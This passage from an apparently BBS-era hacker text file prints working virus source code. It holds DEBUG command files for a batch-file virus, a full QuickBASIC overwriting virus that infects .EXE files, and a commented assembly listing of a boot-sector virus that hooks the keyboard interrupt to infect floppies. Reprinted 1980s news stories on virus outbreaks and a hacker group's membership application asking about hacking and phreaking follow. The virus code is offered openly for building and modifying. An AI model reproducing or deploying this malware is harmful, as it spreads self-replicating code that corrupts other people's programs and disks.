interface is again assigned) +name ( Newly created NAME.BAT is called. + + +In addition to file to this Batch file,there command files,here named 1,2,3 + +Here is the first command file: +------------------------------- +Name: 1 + +1,4d ( Here line 1-4 of the "IND" file are deleted ) +e ( Save file ) + +Here is the second command file: +-------------------------------- +Name: 2 + +m100,10b,f000 (First program name is moved to the F000H address to save) + +e108 ".BAT" (Extention of file name is changed to .BAT) +m100,10b,f010 (File is saved again) +e100"DEL " (DEL command is written to address 100H) +mf000,f00b,104 (Original file is written after this command) +e10c 2e (Period is placed in from of extension) +e110 0d,0a (Carrige return+ line feed) +mf010,f020,11f ( Modified file is moved to 11FH address from buffer area) +e112 "COPY \VR.BAT" ( COPY command is now placed in front of file) +e12b od,0a (COPY command terminated with carriage return + lf) +rxc ( The CX register is ... ) +2c ( set to 2CH) +nname.bat ( Name it NAME.BAT) +w ( Write ) +q ( quit ) + + +The third command file must be printed as a hex dump because it contains +2 control characters (1Ah=Control Z) and this is not entirely printable. + +Hex dump of the third command file: +----------------------------------- +Name: 3 + +0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 + 1 , 1 ? . . n y y y y y y y +0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79 + y . 2 , ? ? r . . n n y y y +0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00 + y y y y . E . . . . . . . . . + + +In order for this virus to work VR.BAT should be in the root. This program +only affects .COM files. +[2.8] + + Viruses in Basic + ---------------- + + +Basic is great language and often people think of it as a limited language +and will not be of any use in creating something like a virus. Well you are +really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987. +This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE +files.To do this you must compile the source code using a the Microsoft +Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit +the source code to place the lenght of the object program in the LENGHTVIR +variable. BV3.EXE should be in the current directory, COMMAND.COM must be +available, the LENGHTVIR variable must be set to the lenght of the linked + +program and remember to use /e parameter when compiling. + + + +10 REM ** DEMO +20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED ** +30 REM ** BASIC DOESNT SUCK +40 REM ** NO KIDDING +50 ON ERROR GOTO 670 +60 REM *** LENGHTVIR MUST BE SET ** +70 REM *** TO THE LENGHT TO THE ** +80 REM *** LINKED PROGRAM *** +90 LENGHTVIR=2641 +100 VIRROOT$="BV3.EXE" +110 REM *** WRITE THE DIRECTORY IN THE FILE "INH" +130 SHELL "DIR *.EXE>INH" +140 REM ** OPEN "INH" FILE AND READ NAMES ** +150 OPEN "R",1,"INH",32000 +160 GET #1,1 +170 LINE INPUT#1,ORIGINAL$ +180 LINE INPUT#1,ORIGINAL$ +190 LINE INPUT#1,ORIGINAL$ +200 LINE INPUT#1,ORIGINAL$ +210 ON ERROR GOT 670 +220 CLOSE#2 +230 F=1:LINE INPUT#1,ORIGINAL$ +240 REM ** "%" IS THE MARKER OF THE BV3 +250 REM ** "%" IN THE NAME MEANS +260 REM ** INFECTED COPY PRESENT +270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210 +280 ORIGINAL$=MID$(ORIGINAL$,1,13) +290 EXTENSIONS$=MID$(ORIGINAL,9,13) +300 MID$(EXTENSIONS$,1,1)="." +310 REM *** CONCATENATE NAMES INTO FILENAMES ** +320 F=F+1 +330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN +GOTO 350 +340 GOTO 320 +350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$ +360 ON ERROR GOTO 210 +365 TEST$="" +370 REM ++ OPEN FILE FOUND +++ +380 OPEN "R",2,OROGINAL$,LENGHTVIR +390 IF LOF(2) < LENGHTVIR THEN GOTO 420 +400 GET #2,2 +410 LINE INPUT#1,TEST$ +420 CLOSE#2 +431 REM ++ CHECK IF PROGRAM IS ILL ++ +440 REM ++ "%" AT THE END OF THE FILE MEANS.. +450 REM ++ FILE IS ALREADY SICK ++ +460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210 +470 CLOSE#1 +480 ORIGINALS$=ORIGINAL$ +490 MID$(ORIGINALS$,1,1)="%" +499 REM ++++ SANE "HEALTHY" PROGRAM ++++ +510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$ +520 SHELL C$ +530 REM *** COPY VIRUS TO HEALTHY PROGRAM **** +540 C$="COPY "+VIRROOT$+ORIGINAL$ +550 SHELL C$ +560 REM *** APPEND VIRUS MARKER *** +570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13 +580 WRITE#1,ORIGINALS$ +590 CLOSE#1 +630 REM ++ OUYPUT MESSAGE ++ +640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!" +650 SYSTEM +660 REM ** VIRUS ERROR MESSAGE +670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM +680 END + + +This basic virus will only attack .EXE files. After the execution you will +see a "INH" file which contains the directory, and the file %SORT.EXE. +Programs which start with "%" are NOT infected ,they pose as back up copies. +;[2.9] +;-----------------------------------------------------------------------; +; This virus is of the "FLOPPY ONLY" variety. ; +; It replicates to the boot sector of a floppy disk and when it gains control +; it will move itself to upper memory. It redirects the keyboard ; +; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; +; it will attempt to infect any floppy it finds in drive A:. ; +; It keeps the real boot sector at track 39, sector 8, head 0 ; +; It does not map this sector bad in the fat (unlike the Pakistani Brain) +; and should that area be used by a file, the virus ; +; will die. It also contains no anti detection mechanisms as does the ; +; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; +; sector 9 because this is common to all floppy formats both single ; +; sided and double sided. It does not contain any malevolent TROJAN ; +; HORSE code. It does appear to contain a count of how many times it ; +; has infected other diskettes although this is harmless and the count ; +; is never accessed. ; +; ; +; Things to note about this virus: ; +; It can not only live through an ALT-CTRL-DEL reboot command, but this ; +; is its primary (only for that matter) means of reproduction to other ; +; floppy diskettes. The only way to remove it from an infected system ; +; is to turn the machine off and reboot an uninfected copy of DOS. ; +; It is even resident when no floppy is booted but BASIC is loaded ; +; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; +; it activates and infectes the floppy from which the user is ; +; attempting to boot. ; +; ; +; Also note that because of the POP CS command to pass control to ; +; its self in upper memory, this virus does not to work on 80286 ; +; machines (because this is not a valid 80286 instruction). ; +; ; +; If your assembler will not allow the POP CS command to execute, replace; +; the POP CS command with an NOP and then assemble it, then debug that ; +; part of the code and place POP CS in place of NOP at that section. ; +; ; +; The Norton Utilities can be used to identify infected diskettes by ; +; looking at the boot sector and the DOS SYS utility can be used to ; +; remove it (unlike the Pakistani Brain). ; +;-----------------------------------------------------------------------; + ; + ORG 7C00H ; + ; +TOS LABEL WORD ;TOP OF STACK +;-----------------------------------------------------------------------; +; 1. Find top of memory and copy ourself up there. (keeping same offset); +; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; +; 3. Redirect int 9 (keyboard) to ourself in top of memory ; +; 4. Jump to ourself at top of memory ; +; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; +;-----------------------------------------------------------------------; +BEGIN: CLI ;INITIALIZE STACK + XOR AX,AX ; + MOV SS,AX ; + MOV SP,offset TOS ; + STI ; + ; + MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) + MOV DS,BX ; + MOV AX,[0013H] ; + MUL BX ; + SUB AX,07E0H ; (7C00H+512)/16 + MOV ES,AX ; + ; + PUSH CS ;DS = CS + POP DS ; + ; + CMP DI,3456H ;IF THE VIRUS IS REBOOTING... + JNE B_10 ; + DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- + ; +B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY + MOV DI,SI ; + MOV CX,512 ; + CLD ; + REP MOVSB ; + ; + MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO + MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE + MOV CX,128 ; + REP MOVSB ; + ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + ; + PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH + POP CS + ; + PUSH DS ;DS=0 ; ES = DS + POP ES ; + ; + MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 + MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 + MOV CX,2708H ; TRACK 40, SECTOR 8 + MOV AX,0201H ; READ SECTOR + INT 13H ; (common to 8/9 sect. 1/2 sided!) + JB $ ; HANG IF ERROR + ; + JMP JMP_BOOT ;JMP 0000:7C00 + ; +;-----------------------------------------------------------------------; +; SAVE THEN REDIRECT INT 9 VECTOR ; +; ; +; ON ENTRY: DS = 0 ; +; ES = WHERE TO SAVE OLD_09 & (HI) ; +; WHERE NEW_09 IS (HI) ; +;-----------------------------------------------------------------------; +PUT_NEW_09: ; + DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 + ; + MOV SI,9*4 ;COPY INT 9 VECTOR TO + MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) + MOV CX,0004 ; + ; + CLI ; + REP MOVSB ; + MOV Word Ptr [9*4],offset NEW_09 + MOV [(9*4)+2],ES ; + STI ; + ; + RET ; + ; +;-----------------------------------------------------------------------; +; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; +;-----------------------------------------------------------------------; +ACK_KEYBD: ; + IN AL,61H ;RESET KEYBOARD THEN CONTINUE + MOV AH,AL ; + OR AL,80H ; + OUT 61H,AL ; + XCHG AL,AH ; + OUT 61H,AL ; + JMP RBOOT ; + ; +;-----------------------------------------------------------------------; +; DATA AREA WHICH IS NOT USED IN THIS VERSION ; +; REASON UNKNOWN ; +;-----------------------------------------------------------------------; +TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 + DB 27H,0,2,2 ; (CURRENTLY NOT USED) + DB 27H,0,3,2 ; + DB 27H,0,4,2 ; + DB 27H,0,5,2 ; + DB 27H,0,6,2 ; + DB 27H,0,7,2 ; + DB 27H,0,8,2 ; + ; +;A7C9A LABEL BYTE ; + DW 00024H ;NOT USED + DB 0ADH ; + DB 07CH ; + DB 0A3H ; + DW 00026H ; + ; +;L7CA1: ; + POP CX ;NOT USED + POP DI ; + POP SI ; + POP ES ; + POP DS ; + POP AX ; + POPF ; + JMP 1111:1111 ; + ; +;-----------------------------------------------------------------------; +; IF ALT & CTRL & DEL THEN ... ; +; IF ALT & CTRL & ? THEN ... ; +;-----------------------------------------------------------------------; +NEW_09: PUSHF ; + STI ; + ; + PUSH AX ; + PUSH BX ; + PUSH DS ; + ; + PUSH CS ;DS=CS + POP DS ; + ; + MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME + IN AL,60H ;GET SCAN CODE + MOV AH,AL ;SAVE IN AH + AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH + ; + CMP AL,1DH ;IS IT A [CTRL]... + JNE N09_10 ;...JUMP IF NO + MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) + JMP N09_30 ; + ; +N09_10: CMP AL,38H ;IS IT AN [ALT]... + JNE N09_20 ;...JUMP IF NO + MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) + JMP N09_30 ; + ; +N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... + JNE N09_30 ;...JUMP IF NO + ; + CMP AL,17H ;IF [I]... + JE N09_X0 ;...JUMP IF YES + CMP AL,53H ;IF [DEL]... + JE ACK_KEYBD ;...JUMP IF YES + ; +N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME + ; +N09_90: POP DS ; + POP BX ; + POP AX ; + POPF ; + ; + DB 0EAH ;JMP F000:E987 +OLD_09 DW ? ; + DW 0F000H ; + ; +N09_X0: JMP N09_X1 ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? + MOV AX,0800H ;AL=0, AH=DELAY ARG + OUT DX,AL ; + CALL DELAY ; + MOV [ALT_CTRL],AX ;AX=0 ; + ; + MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR + INT 10H ; + MOV AH,2 ;SET CURSOR POS 0,0 + XOR DX,DX ; + MOV BH,DH ; PAGE 0 + INT 10H ; + ; + MOV AH,1 ;SET CURSOR TYPE + MOV CX,0607H ; + INT 10H ; + ; + MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) + CALL DELAY ; + ; + CLI ; + OUT 20H,AL ;SEND EOI TO INT CONTROLLER + ; + MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS + MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) + MOV SI,offset BEGIN - 128 ; + MOV CX,128 ; + CLD ; + REP MOVSB ; + ; + MOV DS,CX ;CX=0 ;DS=0 + ; + MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR + MOV [(19H*4)+2],CS ; + ; + MOV AX,0040H ;DS = ROM DATA AREA + MOV DS,AX ; + ; + MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 + INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) + ; + PUSH DS ;IF BIOS F000:E502 == 21E4... + MOV AX,0F000H ; + MOV DS,AX ; + CMP Word Ptr [0E502H],21E4H ; + POP DS ; + JE R_90 ; + INT 19H ; IF NOT...REBOOT + ; +R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! + ; +;-----------------------------------------------------------------------; +; REBOOT INT VECTOR ; +;-----------------------------------------------------------------------; +NEW_19: XOR AX,AX ; + ; + MOV DS,AX ;DS=0 + MOV AX,[0410] ;AX=EQUIP FLAG + TEST AL,1 ;IF FLOPPY DRIVES ... + JNZ N19_20 ;...JUMP +N19_10: PUSH CS ;ELSE ES=CS + POP ES ; + CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + INT 18H ;LOAD BASIC + ; +N19_20: MOV CX,0004 ;RETRY COUNT = 4 + ; +N19_22: PUSH CX ; + MOV AH,00 ;RESET DISK + INT 13 ; + JB N19_81 ; + MOV AX,0201 ;READ BOOT SECTOR + PUSH DS ; + POP ES ; + MOV BX,offset BEGIN ; + MOV CX,1 ;TRACK 0, SECTOR 1 + INT 13H ; +N19_81: POP CX ; + JNB N19_90 ; + LOOP N19_22 ; + JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC + ; +;-----------------------------------------------------------------------; +; Reinfection segment. ; +;-----------------------------------------------------------------------; +N19_90: CMP DI,3456 ;IF NOT FLAG SET... + JNZ RE_INFECT ;...RE INFECT + ; +JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR + JMP 0000:7C00H ; + ; +;-----------------------------------------------------------------------; +; Reinfection Segment. ; +;-----------------------------------------------------------------------; +RE_INFECT: ; + MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH + MOV CX,00E6H ; OURSELF + MOV DI,SI ; + PUSH CS ; + POP ES ; + CLD ; + REPE CMPSB ; + JE RI_12 ;IF NOT EQUAL... + ; + INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) + ; +;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; + MOV BX,offset TABLE ;FORMAT INFO + MOV DX,0000 ;DRIVE A: HEAD 0 + MOV CH,40-1 ;TRACK 39 + MOV AH,5 ;FORMAT + JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! + ; +; <<< NO EXECUTION PATH TO HERE >>> ; + JB RI_80 ; + ; +;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 +RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 + MOV BX,offset BEGIN ;TRACK 40H + MOV CL,8 ;SECTOR 8 + MOV AX,0301H ;WRITE 1 SECTOR + INT 13H ; + ; + PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) + POP ES ; + JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE + ; + MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! + MOV AX,0301 ; + INT 13H ; + JB RI_80 ; IF ERROR...JUMP TO BOOT CODE + ; +RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... + INT 19H ;...FLAG AND REBOOT + ; +RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) + DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) + JMP JMP_BOOT ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS + ; + MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG + MOV BX,0040H ; + MOV DS,BX ; + MOV [0072H],AX ; 0040:0072 = RESET FLAG + JMP N09_90 ; + ; +;-----------------------------------------------------------------------; +; DELAY ; +; ; +; ON ENTRY AH:CX = LOOP COUNT ; +;-----------------------------------------------------------------------; +DELAY: SUB CX,CX ; +D_01: LOOP $ ; + SUB AH,1 ; + JNZ D_01 ; + RET ; + ; +;-----------------------------------------------------------------------; +; ; +;-----------------------------------------------------------------------; +A7DF4 DB 27H,00H,8,2 + +COUNTER_1 DW 001CH +ALT_CTRL DW 0 +A7DFC DB 27H,0,8,2 +[2.10] + + Virili In The News + ------------------ + This section deals with a large amount of stuff, basically, a bunch + of viruses and stuff that have been in the newspapers and magazines cuz + all of the damage they have done. Enjoy.... + + + There's A Virus In My Software + + Mischief-makers at the computer + are deliberately endangering data + + By Philip J. Hilts + + Washington Post Staff Writer + + The Washington Post Weekly Edition, Page #38. May 23-29, 1988. + + Tiny programs that are deliberately cause mischief are epidemic among +computers and causing nervousness among those who monitor them. Since the +first tests of the notion in 1983 that machines can catch and spread +"information diseases," the computer world has reached the point at which as +many as thirty instances of "computer virus" have been reported in the past +year, affecting tens of thousands of U.S. computers alone. + + Such viruses have been found at the National Aeronautics and Space +Administration, International Business Machines Corporation, the House of +Representatives, at least six universities, several major computer networks +such as Comp-u-serve and several businesses, including the world's largest +computer-service company, the $4.4 billion Electronic Data Systems +Corporation of Dallas, Texas. + + Written by malicious programmers, the viruses are sneaked into computer +systems by piggybacking them on legitimate programs and messages. There, +they may be passed along or instructed to wait until a prearranged moment to +burst forth and destroy data. + + Hundreds of computers at the Hebrew University of Jerusalem and other +places in Israel were hit last fall by a virus designed to spread and then, +in one swipe on a Friday the thirteenth, destroy all data in any computer it +could reach. + + If not for an error by it's author, who has not been caught, the virus +could have caused devastation among micro-computers in Israel and other +nations. The virus did not check to see whether it already had infected a +program and so infected some computers hundreds of times, crowding their +memories enough to call attention to itself. + + In a seven-month campaign, programmers in Israel hastened to find +infected machines and ensure that the smallest number would be affected +before Friday, May 13th. Officials say they initially thought that the +infection was connected with the anniversary of the last day that Palestine +existed as a political entity but subsequently decided that it most likely +involved just Friday the thirteenth. + + Apparently, the campaign was successful; there has been no word of +substantial damage. This past Friday the thirteenth is this year's only such +day. + + At the Aldus Corporation of Seattle, Washington, a major software maker, +executives are huddling with lawyers to try to determine whether +international spread of such diseases is illegal. No virus cases have been +taken to court. + + At N.A.S.A. headquarters in Washington, several hundred computers had to +be resuscitated after being infected. N.A.S.A. officials have taken +precautions and reminded their machines' users to follow routine computer +hygiene: Don't trust foreign data or strange machines. + + Viruses have the eerie ability to perch disguised among legitimate data +just as biological viruses hide among genes in human cells, then spring out +unexpectedly, multiplying and causing damage. Experts say that even when +they try to study viruses in controlled conditions, the programs can get out +of control and erase everything in a computer. The viruses can be virtually +impossible to stop if their creators are determined enough. + + "The only way to protect every-body from them is to do something much +worse than the viruses: Stop talking to one another with computers," says +William H. Murray, an information-security specialist at Ernst and Whinney +financial consultants in Hartford, Connecticut. + + Hundreds of programs and files have been destroyed by viruses, and +thousands of hours of repair or prevention time have been logged. +Programmers have quickly produced antidote programs with such titles as +"Vaccine," "Flu Shot," "Data Physician," "Syringe." + + Experts says known damage is minimal compared with the huge, destructive +potential. They express the hope that the attacks will persuade computer +users to minimize access to programming and data. + + "What we are dealing with here is the fabric of trust in society," says +Murray. "With computer viruses, we have a big vulnerability." + + Early this year, Aldus Corporation discovered that a virus had been +introduced that infected at least five-thousand copies of a new drawing +program called Freehand for the Macintosh computer. The infected copies were +packaged, sent to stores and sold. On March 2, the virus interrupted users +by flashing this message on their screens: + + "Richard Brandow, publisher of MacMag, and its entire staff would like +to take this opportunity to convey their universal message of peace to all +Macintosh users around the world." + + Viruses are the newest of evolving methods of computer mayhem, says +Donn B. Parker, a consultant at SRI International, a computer research firm +in Menlo Park, California. One is the "Trojan horse," a program that looks +and acts like a normal program but contains hidden commands that eventually +take effect, ordering mischief. Others include the "time bomb," which +explodes at a set time, and the "logic bomb," which goes off when the +computer arrives at a certain result during normal computation. The "salami +attack" executes barely noticeable results small acts, such as shaving a +penny from thousands of accounts. + + The computer virus has the capability to command the computer to make +copies of the virus and spread them. A virus typically is written only as a +few hundred characters in a program containing tens of thousands of +characters. When the computer reads legitimate instructions, it encounters +the virus, which instructs the computer to suspend normal operations for a +fraction of a second. + + During that time, the virus instructs the computer to check for other +copies of itself and, if none is found, to make and hide copies. Instruction +to commit damage may be included. A few infamous viruses found in the past +year include: + +[] The "scores" virus. Named after a file it spawns, it recently entered + several hundred Macintosh computers at N.A.S.A. headquarters. "It looks + as if it searching for a particular Macintosh program with a name that + no one recognizes," spokesman Charles Redmond says. + + This virus, still spreading, has reached computers in Congress' + information system at the National Oceanic and Atmospheric + Administration and at Apple Computer Incorporated's government-systems + office in Reston, Virginia. It has hit individuals, businesses and + computer "bulletin boards" where computer hobbyists share information. + It apparently originated in Dallas, Texas and has caused damage, but + seemingly only because of its clumsiness, not an instruction to do + damage. + +[] The "brain" virus. Named by its authors, it was written by two brothers + in a computer store in Lahore, Pakistan, who put their names, addresses + and phone number in the virus. Like "scores," it has caused damage + inadvertently, ordering the computer to copy itself into space that + already contain information. + +[] The "Christmas" virus. It struck last December after a West German + student sent friends a Christmas message through a local computer + network. The virus told the receiver's computer to display the + greeting, then secretly send the virus and message to everyone on the + recipient's regular electronic mailing list. + + The student apparently had no idea that someone on the list had + special, restricted access to a major world-wide network of several + thousand computers run by I.B.M. The network broke down within hours + when the message began multiplying, stuffing the computers' memories. + No permanent damage was done, and I.B.M. says it has made repetition + impossible. + + Demonstrations have shown that viruses can invade the screens of users +with the highest security classification, according to Fred Cohen of +Cincinnati, a researcher who coined the term "computer Viruses." A standard +computer-protection device at intelligence agencies, he says, denies giving +access by a person at one security level to files of anyone else at a higher +level and allows reading but denies writing of files of anyone lower. + + This, however, "allows the least trusted user to write a program that +can be used by everyone" and is "very dangerous," he says. + + Computers "are all at risk," says Cohen, "and will continue to be... not +just from computer viruses. But the viruses represent a new level of threat +because of their subtleness and persistence." + + +1.) Computer "viruses" are actually immature computer programs. Most are + written by malicious programmers intent on destroying information in + computers for fun. + +2.) Those who write virus programs often conceal them on floppy disks that + are inserted in the computer. The disks contain all programs needed to + run the machine, such as word processing programs, drawing programs or + spread sheet programs. + +3.) A malicious programmer makes the disk available to others, saying it + contains a useful program or game. These programs can be lent to others + or put onto computerized: "bulletin boards" where anyone can copy them + for personal use. + +4.) A computer receiving the programs will "read" the disk and the tiny virus + program at the same time. The virus may then order the computer to do a + number of things: + + A.) Tell it to read the virus and follow instructions. + + B.) Tell it to make a copy of the virus and place it on any disk inserted + in the machine today. + + C.) Tell it to check the computer's clock, and on a certain date destroy + information that tells it where data is stored on any disk: if an + operator has no way of retrieving information, it is destroyed. + + D.) Tell it not to list the virus programs when the computer is asked for + an index of programs. + +5.) In this way, the computer will copy the virus onto many disks--perhaps + all or nearly all the disks used in the infected machine. The virus may + also be passed over the telephone, when one computer sends or receives + data from another. + +6.) Ultimately hundreds or thousands of people may have infected disks and + potential time bombs in their systems. + + + ----------------------------------------------- + 'Virus' infected hospital computers, + led to epidemic of software mix-ups + ----------------------------------------------- + From the San Diego Tribune + March 23, 1989 + + + BOSTON (UPI) -- A "virus" infected computers at three Michigan hospitals +last fall and disrupted patient diagnoses at two of the centers in what appears +to be the first such invasion of a medical computer, it was reported yesterday. + + The infiltration did not harm any patients but delayed diagnoses by +shutting down computers, creating files of non-existent patients and garbling +names on patient records, which could have caused more serious problems, a +doctor said. + + "It definitely did affect care in delaying things and it could have +affected care in terms of losing this information completely," said Dr. Jack +Juni, a staff physician at the William Beaumont Hospitals in Troy and Royal Oak, +Mich., two of the hospitals involved. + + If patient information had been lost, the virus could have forced doctors +to repeat tests that involve exposing patients to radiation, Juni said +yesterday. The phony and garble files could have caused a mix-up in patient +diagnosis, he said. + + "This was information we were using to base diagnoses on," said Juni, who +reported the case in a letter in The New England Journal of Medicine. "We were +lucky and caught it in time." + + A computer virus is a set of instructions designed to reproduce and spread +from computer to computer. Some viruses do damage in the process, such as +destroying files or overloading computers. + + Paul Pomes, a computer virus expert at the University of Illinois in +Champaign, said this was the first case he had heard of in which a virus had +disrupted a computer used for patient care or diagnosis in a hospital. + + Such disruptions could become more common as personal computers are used +more widely in hospitals, Juni and Pomes said. More people know how to program +-- and therefore sabotage -- personal computers than the more specialized +computers that previously have been used, Pomes said. + + The problem in Michigan surfaced when a computer used to display images +used to diagnose cancer and other diseases began to malfunction at the 250-bed +Troy hospital in August 1988. + + In October, Juni discovered a virus in the computer in the Troy hospital. +The next day, Juni found the same virus in a similar computer in the 1,200-bed +Royal Oak facility, he said. + + The virus apparently arrived in a program in a storage disk that was part +of the Troy computer system, he said. It probably was spread inadvertently to +the Royal Oak computer on a floppy disk used by a resident who worked at both +hospitals to write a research paper, he said. + + The virus also spread to the desk-top computers at the University of +Michigan Medical Center in Ann Arbor, where it was discovered before it caused +problems. + + + "Prosecutor Wins Conviction In Computer Data Destruction" + + September 21, 1988 + + + Fort Worth, Texas (AP) - A former programmer has been convicted of planting +a computer "virus" in his employer's system that wiped out 168,000 records and +was activated like a timb bomb, doing its damage two days after he was fired. + + Tarrant County Assistant District Attorney Davis McCown said he believes e +is the first prosecutor in the country to have someone convicted for destroying +computer records using a "virus." + + "We've had people stealing through computers, but not this type of case," +McCown said. "The basis for this offense is deletion." + + "It's very rare that the people who spread the viruses are caught," said +John McAfee, chairman of the Computer Virus Industry Association in Santa Clara, +which helps educate the public about viruses and find ways to fight them. + + "This is absolutely the first time" for a conviction, McAfee said. + + "In the past, prosecutors have stayed away from this kind of case because +they're too hard to prove," McCown said yesterday. They have also been reluctant +because the victim doesn't want to let anyone know there has been a breach of +security." + + Donald Gene Burleson, 40, was convicted of charges of harmful access to a +computer, a third-degree feloy that carries up to 10 years in prison and up to +$5,000 in fines. + + A key to the case was the fact that State District Judge John Bradshaw +allowed the computer program that deleted the files to be introduced as +evidence, McCown said. It would have been difficult to get a conviction +otherwise, he said. + + The District Court jury deliberated six hours before bringing back the +first conviction under the state's 3-year-old computer sabotage law. + + Burleson planted the virus in revenge for his firing from an insurance +company, McCown said. + + Jurors were told during a technical and sometimes-complicated three-week +trial that Burleson planted a rogue program in the computer system used to store +records at USPA and IRA Co., a Fort Worth-based insurance and brokerage firm. + + A virus is a computer program, often hidden in apparently normal computer +software, that instructs the computer to change or destroy information at a +given time or after a certain sequence of commands. + + The virus, McCown said, was activated Sept. 21, 1985, two days after +Burleson was fired as a computer programmer, because of alleged personality +conflicts with other employees. + + "There were a series of programs built into the system as early as Labor +Day (1985)," McCown said. "Once he got fired, those programs went off." + + The virus was discovered two days later, after it had eliminated 168,00 +payroll records, holding up company paychecks for more than a month. The virus +could have caused hundreds of thousands of dollars in damage to the system had +it continued, McCown said. + WEST COAST CORRUPTED ALLEGIANCE PRESENTS: + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + + >> CORRUPTED PROGRAMMING INTERNATIONAL << + >> MEMBERSHIP APPLICATION << + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + (CPI is a sub-group of WCCA) + +NOTE: The following information is of a totally confidential nature. We must + question you in depth and thouroughly so that our knowledge and idea + of you will be quite complete. Remember, it is the fate of our voting + members who will decide upon your membership, as the result of your + response to this questionarre. Please answer the following completely + and to the best of your ability. Also note that we may decide to voice + validate you or gather any other information through other sources and + will discover if you have placed false or misleading information on + this application. + + +PERSONAL INFORMATION: +----------------------------------------------------------------------------- + Alias(es) You HAVE Used : + Alias(es) You Currently Use : + Your FULL REAL Name : + Your Voice Phone Number :(###)###-#### + Your Data Phone Number :(###)###-#### + Your Mailing Address : + Your City, State & Zip : + Your Age : + Occupation/Grade : + Place of Employment/School : + Work Phone Number : + Your Interests And Hobbies : + +Are You IN ANY WAY Affiliated With ANY Governmental/Law Enforcement Agency? +If So, In What Way? (Such as FBI/Sheriff/Police/etc. YOU KNOW WHAT I MEAN) +: +: + +Are You IN ANY WAY Affiliated With The Telephone Company Or Any Type Of Phone, +Data, Or Long Distance Type Of Company? If So, In What Way? +: +: + + +COMPUTER INFORMATION/EXPERIENCE +----------------------------------------------------------------------------- + Computer Experience (time) : + Modeming Experience (time) : + BBS's You Frequent (Name/#) : + Some Elite References : + Computers You Have Used : + Computer(s) You Are Using : + Computer You Prefer : + Languages You Have Tried : + Languages You Know Well : + Your Best Language : + Have You Ever Phreaked : + Do You Phreak Regularly : + Have You Ever Hacked : + Do You Hack Regularly : + Have You Ever Cracked : + 